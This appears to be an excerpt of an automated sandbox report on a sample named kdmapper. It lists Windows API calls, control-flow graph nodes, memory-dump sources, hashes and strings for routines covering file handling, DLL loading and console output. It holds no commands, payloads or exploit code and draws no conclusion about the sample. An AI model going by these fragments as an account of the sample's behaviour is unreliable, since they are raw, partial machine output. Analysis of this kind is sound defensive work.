                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00160C1E
                                                                                                                                                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00183C7C,?,00000000,?,00000800), ref: 00160C72
                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00183C7C,00000800,?,00000000,?,00000800), ref: 00160C9C
                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00183D44,00000800), ref: 00160CD8
                                                                                                                                                                                                        • Part of subcall function 0016081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00160836
                                                                                                                                                                                                        • Part of subcall function 0016081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015F2D8,Crypt32.dll,00000000,0015F35C,?,?,0015F33E,?,?,?), ref: 00160858
                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00160D4A
                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00160D96
                                                                                                                                                                                                        • Part of subcall function 00154092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001540A5
                                                                                                                                                                                                      • AllocConsole.KERNEL32 ref: 00160D9E
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00160DA8
                                                                                                                                                                                                      • AttachConsole.KERNEL32(00000000), ref: 00160DAF
                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00160DC4
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00160DD5
                                                                                                                                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 00160DDC
                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00160DE7
                                                                                                                                                                                                      • FreeConsole.KERNEL32 ref: 00160DED
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00160DF5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                                                      • API String ID: 1207345701-3298887752
                                                                                                                                                                                                      • Opcode ID: b4523615880f4bea977fbe56b67e68a299fa785c227f8ad4d85a6cfb7cf23924
                                                                                                                                                                                                      • Instruction ID: b4983d6c846063000ac89200c132cf967681d4237f9e69ea2cb5500a84c68367
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4523615880f4bea977fbe56b67e68a299fa785c227f8ad4d85a6cfb7cf23924
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7D173B1408385ABD321EF50CD48A9FBBE8BB85B04F54491DF6A5A6140DBB09748CFA2

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 910 17a95b-17a974 911 17a976-17a986 call 17ef4c 910->911 912 17a98a-17a98f 910->912 911->912 919 17a988 911->919 913 17a991-17a999 912->913 914 17a99c-17a9c0 MultiByteToWideChar 912->914 913->914 917 17a9c6-17a9d2 914->917 918 17ab53-17ab66 call 16fbbc 914->918 920 17aa26 917->920 921 17a9d4-17a9e5 917->921 919->912 923 17aa28-17aa2a 920->923 924 17a9e7-17a9f6 call 182010 921->924 925 17aa04-17aa15 call 178e06 921->925 927 17aa30-17aa43 MultiByteToWideChar 923->927 928 17ab48 923->928 924->928 937 17a9fc-17aa02 924->937 925->928 938 17aa1b 925->938 927->928 931 17aa49-17aa5b call 17af6c 927->931 932 17ab4a-17ab51 call 17abc3 928->932 939 17aa60-17aa64 931->939 932->918 941 17aa21-17aa24 937->941 938->941 939->928 942 17aa6a-17aa71 939->942 941->923 943 17aa73-17aa78 942->943 944 17aaab-17aab7 942->944 943->932 945 17aa7e-17aa80 943->945 946 17ab03 944->946 947 17aab9-17aaca 944->947 945->928 948 17aa86-17aaa0 call 17af6c 945->948 949 17ab05-17ab07 946->949 950 17aae5-17aaf6 call 178e06 947->950 951 17aacc-17aadb call 182010 947->951 948->932 965 17aaa6 948->965 955 17ab41-17ab47 call 17abc3 949->955 956 17ab09-17ab22 call 17af6c 949->956 950->955 964 17aaf8 950->964 951->955 962 17aadd-17aae3 951->962 955->928 956->955 968 17ab24-17ab2b 956->968 967 17aafe-17ab01 962->967 964->967 965->928 967->949 969 17ab67-17ab6d 968->969 970 17ab2d-17ab2e 968->970 971 17ab2f-17ab3f WideCharToMultiByte 969->971 970->971 971->955 972 17ab6f-17ab76 call 17abc3 971->972 972->932
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00175695,00175695,?,?,?,0017ABAC,00000001,00000001,2DE85006), ref: 0017A9B5
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0017ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0017AA3B
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0017AB35
                                                                                                                                                                                                      • __freea.LIBCMT ref: 0017AB42
                                                                                                                                                                                                        • Part of subcall function 00178E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0017CA2C,00000000,?,00176CBE,?,00000008,?,001791E0,?,?,?), ref: 00178E38
                                                                                                                                                                                                      • __freea.LIBCMT ref: 0017AB4B
                                                                                                                                                                                                      • __freea.LIBCMT ref: 0017AB70
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                      • Opcode ID: 04cf03709b1f0853d275f06598e20a1c91e5602f96f4f19459840ead16750e52
                                                                                                                                                                                                      • Instruction ID: 564772627892c97156179dd5745509ab7f3e526e12b8ff25bcceef065c9259ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04cf03709b1f0853d275f06598e20a1c91e5602f96f4f19459840ead16750e52
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2651BF72610216ABDB298E64CC41EAFB7BAEFD4750FA58629FC08D7140EB34DD50C792

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 1002 1598e0-159901 call 16ec50 1005 159903-159906 1002->1005 1006 15990c 1002->1006 1005->1006 1007 159908-15990a 1005->1007 1008 15990e-15991f 1006->1008 1007->1008 1009 159927-159931 1008->1009 1010 159921 1008->1010 1011 159936-159943 call 156edb 1009->1011 1012 159933 1009->1012 1010->1009 1015 159945 1011->1015 1016 15994b-15996a CreateFileW 1011->1016 1012->1011 1015->1016 1017 15996c-15998e GetLastError call 15bb03 1016->1017 1018 1599bb-1599bf 1016->1018 1023 1599c8-1599cd 1017->1023 1027 159990-1599b3 CreateFileW GetLastError 1017->1027 1020 1599c3-1599c6 1018->1020 1022 1599d9-1599de 1020->1022 1020->1023 1025 1599e0-1599e3 1022->1025 1026 1599ff-159a10 1022->1026 1023->1022 1024 1599cf 1023->1024 1024->1022 1025->1026 1028 1599e5-1599f9 SetFileTime 1025->1028 1029 159a12-159a2a call 160602 1026->1029 1030 159a2e-159a39 1026->1030 1027->1020 1031 1599b5-1599b9 1027->1031 1028->1026 1029->1030 1031->1020
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00157760,?,00000005,?,00000011), ref: 0015995F
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00157760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0015996C
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00157760,?,00000005,?), ref: 001599A2
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00157760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001599AA
                                                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00157760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001599F9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                                                      • Opcode ID: f3b69b3dc617403991bf8cbac9dc1fde8201547aea4741348db323c41200fb16
                                                                                                                                                                                                      • Instruction ID: ba246b248a41cbdc65cc07931573d846ff176c64924deaf145c04a813f7ade0a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3b69b3dc617403991bf8cbac9dc1fde8201547aea4741348db323c41200fb16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90311330544785EFE7209B24CC46BDABBD4BB04325F240B1DF9B19A1D1D3A4A998CB92
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0017B8B8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1807457897-3916222277
                                                                                                                                                                                                      • Opcode ID: 46fa55fcdfeff8f5525309d2f89f6a01b2f1db50f162a0635e3c2ae98333022a
                                                                                                                                                                                                      • Instruction ID: b9fbaf04a65c95feb123f642077229bb93ccc6d99cb6921f6e30c8f4f57f9020
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46fa55fcdfeff8f5525309d2f89f6a01b2f1db50f162a0635e3c2ae98333022a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 244108B050824C9EDF258E248CD4BFABBB9EB55308F1444EDE6AEC7142D3359A45CB60
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 001610AB
                                                                                                                                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 001610B2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1231390398-0
                                                                                                                                                                                                      • Opcode ID: 3fa427e931bad535f003a95104cec0b69be1378ef5491165bc4600489f00641d
                                                                                                                                                                                                      • Instruction ID: b2b3f92879a5f38be7f3adfd75ed37d6db5cbd4f59bc5bd38573136ddc96c28c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fa427e931bad535f003a95104cec0b69be1378ef5491165bc4600489f00641d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1E09A32B00249B78F098BA49C158ABB2EDEB442043288179F413E3501FB30EE824BA0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(000000FF,?,?,0015977F,?,?,001595CF,?,?,?,?,?,00182641,000000FF), ref: 0015A1F1
                                                                                                                                                                                                        • Part of subcall function 0015BB03: _wcslen.LIBCMT ref: 0015BB27
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0015977F,?,?,001595CF,?,?,?,?,?,00182641), ref: 0015A21F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeleteFile$_wcslen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2643169976-0
                                                                                                                                                                                                      • Opcode ID: c6f3d100d7b76e959c762991cc33cedc393cb7ffe78847a1ce5e9b0930079036
                                                                                                                                                                                                      • Instruction ID: d0bf69da012568e17c166152883747004a5eb89a394a46341f8ca5b900ab3bf8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6f3d100d7b76e959c762991cc33cedc393cb7ffe78847a1ce5e9b0930079036
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCE0D835140209ABDB019F60EC46FD9379CAF1C7C6F484021BD54D6050EB71DED8EB50
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00160836
                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015F2D8,Crypt32.dll,00000000,0015F35C,?,?,0015F33E,?,?,?), ref: 00160858
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1175261203-0
                                                                                                                                                                                                      • Opcode ID: 2d6923bb16b0abfdaac2732f6ee6bc6c889a9909d9e4fa105786a908bf07b598
                                                                                                                                                                                                      • Instruction ID: 9381a35ed80a0112e5cb0c5682dd45e38f8dca75afe65e518a8498b7f2d4ace5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d6923bb16b0abfdaac2732f6ee6bc6c889a9909d9e4fa105786a908bf07b598
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE012768001186ADB11A794DC45FDA77ACAF09791F0400657A45D2004D774DB948BA0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                                                      • Opcode ID: 2a81f2f9a295af15b29ab2d94201b2756ba1f710e9693c796aa7d95e77388c97
                                                                                                                                                                                                      • Instruction ID: 6b8ba0d132a0aff4ab7ffe1253e94f24302f1b8f31f3d90bb9faeb628f5a8964
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a81f2f9a295af15b29ab2d94201b2756ba1f710e9693c796aa7d95e77388c97
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19C1C730A00254FFDF1ACF64C488BA97BB5AF15311F0801B9EC659F392DB719988CB61
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0016B098
                                                                                                                                                                                                        • Part of subcall function 001513DC: __EH_prolog.LIBCMT ref: 001513E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                                                      • Opcode ID: 5032b478fb50703e2465aab26e369b3633639413472ae64e7a59567b8ddd4908
                                                                                                                                                                                                      • Instruction ID: 497714b7199cd1d757a6d04afc17f7e0983c04440b775e8b0bba9a0e056d0ccf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5032b478fb50703e2465aab26e369b3633639413472ae64e7a59567b8ddd4908
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6231AB75804249EECF15DF64DC91AEEBBB4AF19304F1044AEE819B7242DB35AE08CB61
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                                                      • Opcode ID: 677b49130720fd2b688d532bd004c7be60803be9ca8931852933c5576691f167
                                                                                                                                                                                                      • Instruction ID: ba354f890d29b30bacf0e1bbef0b5c7c50b5bbdccca11dd20f58d883ee748c99
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 677b49130720fd2b688d532bd004c7be60803be9ca8931852933c5576691f167
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B015273900528EBCF22ABA8CD919DEB775BF98751F014515EC26BF152DB348D0887A1
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,00183A34,00000000,?,0017989A,00000001,00000364,?,?,?,0015D984,?,?,?,00000004,0015D710), ref: 0017B177
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                      • Opcode ID: 7a087fa328b30db3fd43e788f0967a141229354b54d08d24dd417be4d8c1f165
                                                                                                                                                                                                      • Instruction ID: 7211f0a16ad3543a57650a6e78731dea4b99334fcc7be8bf2daf4b473de17823
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a087fa328b30db3fd43e788f0967a141229354b54d08d24dd417be4d8c1f165
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF0893254D12577DB255A21BC69B9F7778AF51770B59C211FC0C9B590CF31DE0186E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileType.KERNELBASE(000000FF,001597BE), ref: 001598C8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
